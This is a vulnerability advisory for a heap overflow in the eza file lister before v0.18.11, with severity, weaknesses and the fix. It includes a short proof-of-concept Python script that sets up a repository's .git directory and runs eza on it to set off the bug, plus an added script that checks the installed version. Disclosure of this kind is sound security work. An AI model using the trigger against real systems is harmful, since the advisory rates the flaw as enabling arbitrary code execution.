# Summary
In `eza` [^1] (before `v0.18.11`), there is a heap overflow vulnerability, first observed on the Ubuntu for Raspberry Pi series of systems with the `ubuntu-raspi` kernel, related to handling of the `.git` directory.
# Details
The vulnerability appears to be triggered by the `.git` directory of certain projects. The issue may depend on specific files, and the directory structure also plays a role in triggering it. Files and folders that may be involved include `.git/HEAD`, `.git/refs`, and `.git/objects`.
# PoC - If you have a Raspberry Pi 4B bare metal machine
**If you don't have a bare metal Raspberry Pi, you can try emulating an Ubuntu for Raspberry Pi system in a virtual machine.**
You just need to install any one of the Ubuntu for Raspberry Pi series systems on your bare metal machine.
## Tested platform info
Configuration in `Raspberry Pi 4B` bare metal machine:
```bash
eza version: v0.18.10 [+git]
Linux lux 5.15.0-1049-raspi #52-Ubuntu SMP PREEMPT Thu Mar 14 08:39:42 UTC 2024 aarch64 aarch64 aarch64 GNU/Linux
Distributor ID: Ubuntu
Description: Ubuntu 22.04.4 LTS
Release: 22.04
Codename: jammy
```
> [!IMPORTANT]
> So far I have only tested `Ubuntu 22.04.4 LTS Server` and confirmed that this vulnerability exists. I haven't tested other systems/Raspberry Pi models yet.
## Steps
Install `eza (<=v0.18.10)` on the Raspberry Pi. The process is described in the official [wiki](https://github.com/eza-community/eza/blob/main/INSTALL.md).
```python
#!/usr/bin/env python3
import os
import shutil
import subprocess
# Step 1: Clone the repository
repo_url = "https://github.com/umami-software/umami.git"
subprocess.run(["git", "clone", repo_url])
# Step 2: Check out the specific commit containing the special '.git' directory that can trigger the vulnerability
repo_dir = "umami"
commit_hash = "a38baa5"
os.chdir(repo_dir)
subprocess.run(["git", "checkout", commit_hash])
# Step 3: Create a directory for the vulnerability related files
os.chdir("..")
os.mkdir("suspicious")
shutil.move(os.path.join(repo_dir, ".git"), "suspicious/.git")
# Step 4: Remove unrelated files/directories
shutil.rmtree(repo_dir)
# Step 5: Trigger the vulnerability
subprocess.run(["eza", "-l", "--git", "suspicious/.git"])
```
> [!NOTE]
> The picture shows my test environment. In actual testing, the vulnerability can be triggered by just using the above script.
# Impact
Arbitrary code execution.
# Severity using CVSS
Severity: `High 8.4`<br />
Vector string: `CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
# Weaknesses
- Heap-based Buffer Overflow (CWE-122)
- Improper Restriction of Operations within the Bounds of a Memory Buffer (CWE-119)
- Missing Release of Memory after Effective Lifetime (CWE-401)
- Improper Resource Shutdown or Release (CWE-404)
- Improper Initialization (CWE-665)
# GitHub Advisories
- GitHub Advisories.[^3]
# NIST
- National Vulnerability Database.[^4]
# Solution
Update eza to `0.18.11` or a higher version.
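As an added example (not part of this advisory or the eza project), the following Python script checks whether an installed `eza` falls below the fixed release `0.18.11` by parsing the version line in the format shown in the tested platform info above (e.g. `eza version: v0.18.10 [+git]`). It assumes `eza --version` prints such a `vX.Y.Z` line and that the `[+git]` marker denotes a build with git support; both are assumptions of this example.

```python
#!/usr/bin/env python3
"""Flag eza installations older than the fixed release for CVE-2024-25817."""
import re
import subprocess

# First version containing the fix, as stated in the advisory's Solution section.
FIXED_VERSION = (0, 18, 11)

# Matches "v0.18.10 [+git]" style version strings; the optional bracketed tags
# (e.g. "[+git]") follow the version number.
_VERSION_RE = re.compile(r"v(\d+)\.(\d+)\.(\d+)(?P<tags>(?:\s*\[[^\]]*\])*)")


def parse_version_line(text):
    """Return ((major, minor, patch), git_support) from eza's version output.

    git_support is True when a "[+git]" tag is present (assumption: that tag
    is how eza reports a build with git support).
    """
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError(f"unrecognised eza version text: {text!r}")
    version = tuple(int(x) for x in m.group(1, 2, 3))
    git_support = "+git" in m.group("tags")
    return version, git_support


def is_affected(text):
    """True when the reported version is older than the fixed release."""
    version, _ = parse_version_line(text)
    return version < FIXED_VERSION


def check_installed(binary="eza"):
    """Run `<binary> --version` and report (affected, git_support)."""
    out = subprocess.run([binary, "--version"], capture_output=True,
                         text=True, check=True).stdout
    version, git_support = parse_version_line(out)
    return version < FIXED_VERSION, git_support


if __name__ == "__main__":
    affected, git_support = check_installed()
    status = "AFFECTED, update to 0.18.11 or later" if affected else "fixed"
    print(f"eza: {status} (git support: {git_support})")
```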
# References
[^1]: [eza](https://github.com/eza-community/eza/tree/main): A modern, maintained replacement for ls.
[^3]: [GitHub Advisories](https://github.com/advisories/GHSA-3qx3-6hxr-j2ch)
[^4]: [CVE-2024-25817](https://nvd.nist.gov/vuln/detail/CVE-2024-25817)